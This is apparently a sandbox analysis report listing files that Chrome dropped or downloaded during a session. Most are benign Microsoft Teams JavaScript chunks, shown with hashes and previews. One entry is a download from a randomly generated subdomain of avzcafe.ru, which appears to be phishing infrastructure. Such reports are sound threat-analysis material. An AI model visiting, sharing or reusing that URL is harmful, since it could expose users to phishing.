                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[897526],{403966:(e,t,r)=>{r.d(t,{F:()=>i});const i=globalThis.performance},38176:(e,t,r)=>{r.d(t,{$:()=>i});const i={verbose:10,default:20,error:30}},964633:(e,t,r)=>{function i(e,t){if(!e)throw new Error("number"==typeof t?`0x${t.toString(16).padStart(3,"0")}`:t)}r.d(t,{v:()=>i})},362008:(e,t,r)=>{r.d(t,{f:()=>b});var i=r(964633);const n=432e6;var o=r(753343),s=r(734389),a=r(674344);const c="fluidDriverCache",l="driverStorage.V3",d={1:"diverStorage",2:"diverStorage.V2"};function u(e){return`${e.file.docId}_${e.type}_${e.key}`}function h(e){return new Promise(((t,r)=>{(0,a.P2)(c,3,{upgrade:(t,r)=>{try{const e=d[r];e&&t.deleteObjectStore(e)}catch(t){(0,o.pW)({logger:e}).sendErrorEvent({eventName:"FluidCacheDeleteOldDbError"},t)}const i=t.createObjectStore(l);i.createIndex("createdTimeMs","createdTimeMs"),i.createIndex("lastAccessTimeMs","lastAccessTimeMs"),i.createIndex("parti
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (7979)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):8086
                                                                                                                                                                                                                                                                            Entropy (8bit):4.542394330601067
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:kxpPTqixUsv1FEouEwUFNbgF3sTnF4m4/rbgI8DT1DdhWMJT:kvTL/7fbgxunF4m4Dbgn13JT
                                                                                                                                                                                                                                                                            MD5:BCD0E506BC6CECA01C797848A1E18B4D
                                                                                                                                                                                                                                                                            SHA1:83C4C588CC01313141E40BAB05D3D5053CA55DEA
                                                                                                                                                                                                                                                                            SHA-256:0847EE837BA3D9F99BC54F557E11FC4A1BCDEB998F68AD2A5875BC25C567B45D
                                                                                                                                                                                                                                                                            SHA-512:8BBB26B17FC40CA917EF87302C0F7B0E616A8BD67F5F49085CBA52E256335B2C29311432CF28F9BDF17D4741D729D0E10E45A12A46B7A3D7ED226A5D12E63E27
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[49749],{49749:(a,l,c)=>{c.d(l,{va_:()=>Z,i00:()=>e,aYy:()=>v,S61:()=>m,yDM:()=>L,nU0:()=>M,iAS:()=>H,p4K:()=>t,LMj:()=>u,Jtj:()=>i,OEF:()=>V,csZ:()=>s,OL4:()=>D,I0J:()=>U,KDM:()=>r,K4O:()=>A,APn:()=>n,VyF:()=>g,x7t:()=>R,IuD:()=>o});var h=c(693935);const Z=(0,h.U)("Delete16Regular","16",["M7 3h2a1 1 0 0 0-2 0ZM6 3a2 2 0 1 1 4 0h4a.5.5 0 0 1 0 1h-.56l-1.2 8.84A2.5 2.5 0 0 1 9.74 15h-3.5a2.5 2.5 0 0 1-2.48-2.16L2.57 4H2a.5.5 0 0 1 0-1h4Zm1 3.5a.5.5 0 0 0-1 0v5a.5.5 0 0 0 1 0v-5ZM9.5 6c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0v-5c0-.28.22-.5.5-.5Zm-4.74 6.7c.1.75.74 1.3 1.49 1.3h3.5a1.5 1.5 0 0 0 1.5-1.3L12.42 4H3.57l1.19 8.7Z"]),e=(0,h.U)("Delete20Filled","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM9 8a.5.5 0 0 0-1 0v6a.5.5 0 0 0 1 0V8Zm2.5-.5a.5.5 0 0 0-.5.5v6a.5.5 0
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (43425)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):43533
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2090613026600465
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:VtXZGCUCr0VC2CGC6Ch+/6CDCBCICTIg17CWtBIY7/2emockcRG0:VVICUCgC2CGC6CAiCDCBCICTpCWjyF
                                                                                                                                                                                                                                                                            MD5:7CF7331E970587E7E8796556AE6910D2
                                                                                                                                                                                                                                                                            SHA1:8A98A39E2BE8FD2123487C085B8306DFDDDF9BB5
                                                                                                                                                                                                                                                                            SHA-256:87D56429B11DB224B9DD392C380E0BE6D2389CDDB2D30E96E617986A3325E067
                                                                                                                                                                                                                                                                            SHA-512:724F9EACB63C302614CB3B3AE467BA87971EC84FFDB7F49D1D5443655A42E70D7D20206801605ADA83E1F8FECBB2F7505CF9F0B7AA13623EC7643472F533FD49
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[900161],{414250:(e,t,l)=>{l.d(t,{g:()=>C});var a=l(513432),C=(0,l(485529).Ke)({svg:function(e){var t=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 32 32",className:t.svg},a.createElement("path",{d:"M9.5 29H28.5C28.775 29 29 28.775 29 28.5V9H24.5C23.673 9 23 8.327 23 7.5V3H9.5C9.225 3 9 3.225 9 3.5V28.5C9 28.775 9.225 29 9.5 29Z",fill:"white"}),a.createElement("path",{d:"M28.293 8.00003L24 3.70703V7.50003C24 7.77503 24.225 8.00003 24.5 8.00003H28.293Z",fill:"white"}),a.createElement("path",{opacity:"0.64",fillRule:"evenodd",clipRule:"evenodd",d:"M29.56 7.854L24.146 2.439C23.8642 2.15891 23.4833 2.00117 23.086 2H9.5C8.673 2 8 2.673 8 3.5V28.5C8 29.327 8.673 30 9.5 30H28.5C29.327 30 30 29.327 30 28.5V8.914C30 8.514 29.844 8.137 29.56 7.854ZM24 3.707L28.293 8H24.5C24.2241 7.99945 24.0005 7.77591 24 7.5V3.707ZM9.5 29H28.5C28.775 29 29 2
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru/mjiglbhvzysujfpfwkvfxrkFvoJkmovXLGALCDMYWHBJHQVGUVBUWEEDSMN
                                                                                                                                                                                                                                                                            Preview:1
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1317)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                                                                                                                            Entropy (8bit):5.322530262992215
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38ngM5xx8FsJeybSOPqJRPmC0vkjaLd76hpa8AP3LipufqJNtPa5eEpa8Ay:wp3sp3H2xOs36ReC0cjaLt3quq/keJqn
                                                                                                                                                                                                                                                                            MD5:1B6A88F9DD5747B566119263B842D4F0
                                                                                                                                                                                                                                                                            SHA1:36FD7F0500944CFE6158015CD20049DA6220F9A9
                                                                                                                                                                                                                                                                            SHA-256:E778D24A4A48AC146531FD90136935295D5FC2030E7565A0F4ADE82827E38C13
                                                                                                                                                                                                                                                                            SHA-512:FB44C08F3DD03D9F0CEAB3B611079FA374AFEB235C4925A1C8750E768BEECAD43F421383148D1A59C3A963C46280B7DE95D73FF3E16F103755B3B5FA2B20C863
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990521],{990521:(e,s,a)=>{a.d(s,{T:()=>n});var l=a(957032),C=a(395225),t=a.n(C),c=a(485529),i=a(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,l.Y)("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:e.svg,children:[(0,l.Y)("g",{className:t()(i.Q.outline,e.outlinePart),children:[(0,l.Y)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8 2C6.89543 2 6 2.89543 6 4V14C6 15.1046 6.89543 16 8 16H14C15.1046 16 16 15.1046 16 14V4C16 2.89543 15.1046 2 14 2H8ZM7 4C7 3.44772 7.44772 3 8 3H14C14.5523 3 15 3.44772 15 4V14C15 14.5523 14.5523 15 14 15H8C7.44772 15 7 14.5523 7 14V4Z"}),(0,l.Y)("path",{d:"M4 6.00001C4 5.25973 4.4022 4.61339 5 4.26758V14.5C5 15.8807 6.11929 17 7.5 17H13.7324C13.3866 17.5978 12.7403 18 12 18H7.5C5.567 18 4 16.433 4 14.5V6.00001Z"})]}),(0,l.Y)("g",{className:t()(i.Q.filled,e.filledPart),children:[(0,l.Y)("path",{d:"M6 4C6 2.89543 6.8954
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2234)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):2342
                                                                                                                                                                                                                                                                            Entropy (8bit):4.777133342218861
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3Lk0T3xl2DkuBuXLgQhsrrzb3fYosOVeCL1TworW7kFAQq:Vk02Dpcbh4rzDFVxpTwn0xq
                                                                                                                                                                                                                                                                            MD5:934D2952A100D5FD1D5400A7DC870E88
                                                                                                                                                                                                                                                                            SHA1:EC89C116E3D50D06BFDCB31CC2A3A4DC0F5BF87A
                                                                                                                                                                                                                                                                            SHA-256:FBC293508A37DD05FDF4D716E965E6831920B4D76C0BB95A1E5BF621BF132976
                                                                                                                                                                                                                                                                            SHA-512:A66A0213EAE6770956267802272180569F3EC79A3E8A4A967B25E4C0890D78E35E46E77526FAF390609FCD02FFCEAD0DB8083181158A5BE6E93012559D9794D5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/428348-eca109e63880cadf.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[428348],{428348:(e,L,a)=>{a.d(L,{s:()=>n});var s=a(513432),t=a(395225),C=a.n(t),l=a(485529),c=a(829289),n=(0,l.Ke)({svg:function(e){var L=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:L.svg},s.createElement("path",{className:C()(c.Q.outline,L.outlinePart),d:"M15.5 16.9989C15.7761 16.9989 16 17.2227 16 17.4989C16 17.7443 15.8231 17.9485 15.5899 17.9908L15.5 17.9989H4.5C4.22386 17.9989 4 17.775 4 17.4989C4 17.2534 4.17688 17.0493 4.41012 17.0069L4.5 16.9989H15.5ZM10.0001 2.0011C10.2456 2.0011 10.4497 2.1781 10.492 2.41137L10.5 2.50124L10.496 14.2951L14.1414 10.6468C14.3148 10.473 14.5842 10.4535 14.7792 10.5883L14.8485 10.6461C15.0222 10.8195 15.0418 11.0889 14.907 11.2839L14.8492 11.3532L10.3574 15.8532C10.285 15.9259 10.1957 15.9715 10.1021 15.9902L9.99608 16C9.83511 16 9.69192 15.9239 9.60051 15.8057L5.14386 11.35
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6565)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):6673
                                                                                                                                                                                                                                                                            Entropy (8bit):5.188554109702156
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:pFI31EXqP8+2Oj31wvm3YEZUVaIBlPC9aNMM1vbLIAVJeeQ2wz0cYW9a198:pYiXMwvUZCQaac1jwz0cM1u
                                                                                                                                                                                                                                                                            MD5:903DB9F502EF645D912B50F781960FFA
                                                                                                                                                                                                                                                                            SHA1:50C7B1E5533C892E5C5AC0A47485C0B5C158DE78
                                                                                                                                                                                                                                                                            SHA-256:28CD6C823E1FA6F9A6DADECD2ED9FCBD55EB1FFE831CE0A7B3952C6804B21B9C
                                                                                                                                                                                                                                                                            SHA-512:AF378F8600F59FFA1A5C70F6FC322416B555D506A9ABDC291EE443303B66C754A84754B4BB849D53EA36DE7B1762349C6C1CC7A2D01D2A4A4F173C54A885456E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945208],{478331:(e,t)=>{var r=Symbol.for("react.element"),n=Symbol.for("react.portal"),o=Symbol.for("react.fragment"),u=Symbol.for("react.strict_mode"),a=Symbol.for("react.profiler"),c=Symbol.for("react.provider"),i=Symbol.for("react.context"),f=Symbol.for("react.forward_ref"),s=Symbol.for("react.suspense"),l=Symbol.for("react.memo"),p=Symbol.for("react.lazy"),y=Symbol.iterator;var d={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},_=Object.assign,h={};function m(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}function b(){}function v(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}m.prototype.isReactComponent={},m.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error("setState(...): takes an object of state variables to u
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3971)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):4079
                                                                                                                                                                                                                                                                            Entropy (8bit):5.303593149178301
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:AKyq75bqlUMjMzjy6YRQE5qQEPJbP2pGO63:ZVbIYH9QEPJbP2oR3
                                                                                                                                                                                                                                                                            MD5:FF7BA3DED0CB6CDE2FDD7CC73AD36CC7
                                                                                                                                                                                                                                                                            SHA1:7329F5FD2EF53DEC8220DB9CA69C7A058E8B4386
                                                                                                                                                                                                                                                                            SHA-256:5B6C65EE1CC693700CF933136ED47345604718427FFAD38D638166DA4217E964
                                                                                                                                                                                                                                                                            SHA-512:482AE7DF2909AE55250DB8EEAAA95B7FA92968802AF6C972C910BED2830B958813CBB263E73EDA6CC4AB27C3236D4BED8ECF8C4CA94F01FF0F8CCA0D36749A65
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/981746-a3168603d4db6f8f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981746],{987867:(e,n)=>{function t(e,n){var t=e.length;e.push(n);e:for(;0<t;){var a=t-1>>>1,r=e[a];if(!(0<i(r,n)))break e;e[a]=n,e[t]=r,t=a}}function a(e){return 0===e.length?null:e[0]}function r(e){if(0===e.length)return null;var n=e[0],t=e.pop();if(t!==n){e[0]=t;e:for(var a=0,r=e.length,l=r>>>1;a<l;){var u=2*(a+1)-1,o=e[u],s=u+1,c=e[s];if(0>i(o,t))s<r&&0>i(c,o)?(e[a]=c,e[s]=t,a=s):(e[a]=o,e[u]=t,a=u);else{if(!(s<r&&0>i(c,t)))break e;e[a]=c,e[s]=t,a=s}}}return n}function i(e,n){var t=e.sortIndex-n.sortIndex;return 0!==t?t:e.id-n.id}if("object"==typeof performance&&"function"==typeof performance.now){var l=performance;n.unstable_now=function(){return l.now()}}else{var u=Date,o=u.now();n.unstable_now=function(){return u.now()-o}}var s=[],c=[],f=1,b=null,p=3,d=!1,v=!1,y=!1,_="function"==typeof setTimeout?setTimeout:null,m="function"==typeof clearTimeout?clearTimeout:null,h="und
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8001)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):8108
                                                                                                                                                                                                                                                                            Entropy (8bit):4.549545678850894
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:o9gbac64rkT+oSl1mRU1Wgcugcrj1SELqaQ6KrEY:o9vUoQoiPIEdQ6Ol
                                                                                                                                                                                                                                                                            MD5:287A004D080AF3408A3F25E336576729
                                                                                                                                                                                                                                                                            SHA1:BAD3E0268D7A0F8C1F10961BBADE39446A378924
                                                                                                                                                                                                                                                                            SHA-256:0708C60B65649BA3BB61A0BFEC4F52984B04E2C7EF1AAAA533E063EBECD5D317
                                                                                                                                                                                                                                                                            SHA-512:937DE395C8E3F0D5EEF955BA184361DD5AFD2E79B0A5060BCA9FAD28BD1EB63F011FB3B26361F71221117B7BB5C5681B2C70EAC7F3D2F2975D86A07CB6150A1E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/27001-fe02db0f643f10d6.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[27001],{27001:(a,l,c)=>{c.d(l,{XfG:()=>Z,gYT:()=>v,Kug:()=>r,OO7:()=>e,bNk:()=>M,aHF:()=>A,ugD:()=>t,spB:()=>m,WG1:()=>V,IQ:()=>o,SNF:()=>U,VM4:()=>i,FvG:()=>H,T1Y:()=>u,FPz:()=>L,pTW:()=>s,Ncu:()=>k,H3l:()=>R,mk2:()=>g,_OX:()=>p});var h=c(693935);const Z=(0,h.U)("ArrowReset20Regular","20",["M5.85 2.65c.2.2.2.5 0 .7L4.21 5H11a6 6 0 1 1-6 6 .5.5 0 0 1 1 0 5 5 0 1 0 5-5H4.2l1.65 1.65a.5.5 0 1 1-.7.7l-2.5-2.5a.5.5 0 0 1 0-.7l2.5-2.5c.2-.2.5-.2.7 0Z"],{flipInRtl:!0}),v=(0,h.U)("ArrowRight24Filled","24",["M13.7 4.28a1 1 0 1 0-1.4 1.43L17.67 11H4a1 1 0 1 0 0 2h13.66l-5.36 5.28a1 1 0 0 0 1.4 1.43l6.93-6.82c.5-.5.5-1.3 0-1.78L13.7 4.28Z"]),r=(0,h.U)("ArrowSort20Filled","20",["M14.84 16.72a.76.76 0 0 1-.59.28.73.73 0 0 1-.53-.22l-3-3a.75.75 0 0 1 1.06-1.07l1.72 1.73V3.75a.75.75 0 0 1 1.5 0v10.68l1.72-1.71a.75.75 0 1 1 1.06 1.06l-2.94 2.94ZM6.34 3.28A.76.76 0 0 0 5.75 3c-.2 0-.38.07-.5
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):174887
                                                                                                                                                                                                                                                                            Entropy (8bit):5.321105004539833
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:VIOrThlUC2xVJPohO+3CGKhquKln5EWmgc:uOPhp2xVJPohO+SG5Ygc
                                                                                                                                                                                                                                                                            MD5:655691506915B9BFF693016B849E2857
                                                                                                                                                                                                                                                                            SHA1:D5785A2A40FD4048E05CD9F82D032A97C6FA89FE
                                                                                                                                                                                                                                                                            SHA-256:776FC77C37BFC3100BDBD76F016580FD63D8F9CC969A06031B59EB7FEBA46B2F
                                                                                                                                                                                                                                                                            SHA-512:206E27B1CA4A8634515713F3F3136DC7AE00AFF343DB67167DD3DF44D86FC54710451A31C9FDA956BFDB2D1E66C66E0DA13BBDDB480A5E89A88652FA2785F004
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/71987-4479046fa7761d52.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[71987],{923226:(e,t,n)=>{var i,a,r,o,s;n.d(t,{IO:()=>i,Wx:()=>a,$b:()=>r,BV:()=>o,fP:()=>s,lV:()=>d,p$:()=>l}),function(e){e.POP="pop",e.BEARER="Bearer"}(i||(i={})),function(e){e[e.Skype=0]="Skype",e[e.AAD=1]="AAD",e[e.CAE=2]="CAE"}(a||(a={})),function(e){e[e.Error=0]="Error",e[e.Warning=1]="Warning",e[e.Info=2]="Info",e[e.Verbose=3]="Verbose"}(r||(r={})),function(e){e.ag08="ag08",e.ag09="ag09",e.dod="dod",e.gcc="gcc",e.gcchigh="gcchigh",e.life="life",e.prod="prod"}(o||(o={})),function(e){e.LOKI_TFL_AUTH_TOKEN_AUDIENCE="liveprofilecard.access",e.MT="https://api.spaces.skype.com",e.GROUPS_SERVICE="https://groupssvc.fl.teams.microsoft.com/teams.readwrite",e.AAD_V2_TFL="https://mtsvc.fl.teams.microsoft.com/teams.mt.readwrite",e.UNIFIED_CONSENT_WEB_AUTH_URL="https://consentservice.microsoft.com/web/UnifiedUserConsent.ReadWrite",e.UNIFIED_CONSENT_CHECKIN_AUTH_URL="https://consents
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (16145)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):16253
                                                                                                                                                                                                                                                                            Entropy (8bit):5.32023556104866
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:UHGHYU1V4di/pFRwt01Ls4v74FIXX/hIik6pjRiE1ntH:UHG4U1V4diVi2Ls+74FIXX/Gik6pjwid
                                                                                                                                                                                                                                                                            MD5:1EFDD6A85BA00272896DC29AF480ACD7
                                                                                                                                                                                                                                                                            SHA1:2FB2D7957ED143B078664B99B83FFE98623090B6
                                                                                                                                                                                                                                                                            SHA-256:2ED23F9D4D8C12FCC9EE846A86333EAD49C2CCB2E081EDC4E12B64D703DD59C9
                                                                                                                                                                                                                                                                            SHA-512:077387F39B2AE72A893261DE8FD3EDB3ED4E3FD948B048A88D107BA72904151C4994792F6C954AE47A6FFD95F811429AD3D3AEB7DF4AB4423115F1E453CDE197
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[326041,797071,693593],{797071:(e,t,n)=>{"use strict";n.d(t,{gB:()=>b,be:()=>s,m$:()=>c,kL:()=>f,JR:()=>D,gl:()=>S,_G:()=>v});var r=n(513432),o=n.n(r),i=n(712284),a=n(354055);function s(e,t,n){const r=e.slice();return r.splice(n<0?r.length+n:n,0,r.splice(t,1)[0]),r}function d(e,t){return e.reduce(((e,n,r)=>{const o=t.get(n);return o&&(e[r]=o),e}),Array(e.length))}function u(e){return null!==e&&e>=0}const l={scaleX:1,scaleY:1},c=e=>{var t;let{rects:n,activeNodeRect:r,activeIndex:o,overIndex:i,index:a}=e;const s=null!=(t=n[o])?t:r;if(!s)return null;const d=function(e,t,n){const r=e[t],o=e[t-1],i=e[t+1];if(!r||!o&&!i)return 0;if(n<t)return o?r.left-(o.left+o.width):i.left-(r.left+r.width);return i?i.left-(r.left+r.width):r.left-(o.left+o.width)}(n,a,o);if(a===o){const e=n[i];return e?{x:o<i?e.left+e.width-(s.left+s.width):e.left-s.left,y:0,...l}:null}return a>o&&a<=i?{x:-s.width-d,y:0,...l}:a
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31284)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):31398
                                                                                                                                                                                                                                                                            Entropy (8bit):5.331482177569915
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ZTAybJiiyoHe8UQ68Ji799d0nx2+xFFQEeTRh9Y6DbP9A5ZtKDZrBShFCpXQ77iY:ZTz1iixHKNseDdvMOpXguY
                                                                                                                                                                                                                                                                            MD5:DBD079ED30F84ED4952EEE454733AE7D
                                                                                                                                                                                                                                                                            SHA1:E3753C11FA79C36DB8EAE043CC3DFBD66D8BAC85
                                                                                                                                                                                                                                                                            SHA-256:A93E1696D5BA2DF1A6B5D0A1B3FFCDDD2FF6E8E81B2E2531255B99F8DD852683
                                                                                                                                                                                                                                                                            SHA-512:259D7C4A462AA51812A70416226BBBF80DB02532E46CC4F108BA19761BC4C5BD01102E9E27DDFBE64C428A1BEC581B659B553998B02FD54A3FE3585E0B4988E5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[148298],{845484:(e,t,r)=>{r.r(t),r.d(t,{Msal2AuthenticationProvider:()=>k,convertTokenResourceToMsalCompatible:()=>C});var i=r(364819),o=r(280454),n=r(495668),s=r(608911),a=r(981462),c=r(847431),l=r(923226),u=r(848020),d=r(366603),h=r(935008),_=r(510139),g=r(703478),p=r(417694),A=r(469974),m=r(211713),f=r(72909),I=r(78219),S=r(565439),b=r(406138),v=r(775251);const T=["service::api.fl.spaces.skype.com::MBI_SSL"],{PopUpWindowError:R}=c.tG;class k{constructor(e,t,r,n,f){this._config=e,this._currentUrl=t,this._windowProvider=r,this._crossTabCallbacks=n,this._coreSettings=f,this._authority="",this._waitingForHandleRedirectToCompletePromise=void 0,this.login=async e=>{const{correlation:t,silent:r,extraQueryParameters:i}=e,o=e.loginHint||this._config.loginHintFromCore;await this._waitingForHandleRedirectToCompletePromise;const n=!!i?.tenant_login_for_mfa,s=!!i?.isTenantQsp,a=i?.tena
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):117250
                                                                                                                                                                                                                                                                            Entropy (8bit):5.162816607799181
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:VJnpRP9EvMVNqpO+sq1YuCFiittzZSLF6c4maUNOwFG7KEEMbg4lxzRSYlwqo3nz:VJpljKsc4mabKEngkoojxgtxtGNL9i
                                                                                                                                                                                                                                                                            MD5:B3031C4F76717B55FAC2255321C6DFA0
                                                                                                                                                                                                                                                                            SHA1:1DFAC14C343D0FF7993C6A350F08EB23336D4A98
                                                                                                                                                                                                                                                                            SHA-256:9450D8177F5466EB1DA5B163BC61851902E688B46D31C02723DD0AB5796770E6
                                                                                                                                                                                                                                                                            SHA-512:26D84072A6825C4E7F4F2F607D8A9AB1057B6D778D801B59F24A7635DC525F0D3D0F672CE641F9D9C9CCD4DBB644E4AB62810D04399DF100774730356D0B2EE8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/367927-44fa44710376bb7a.js?cb=1733248794160
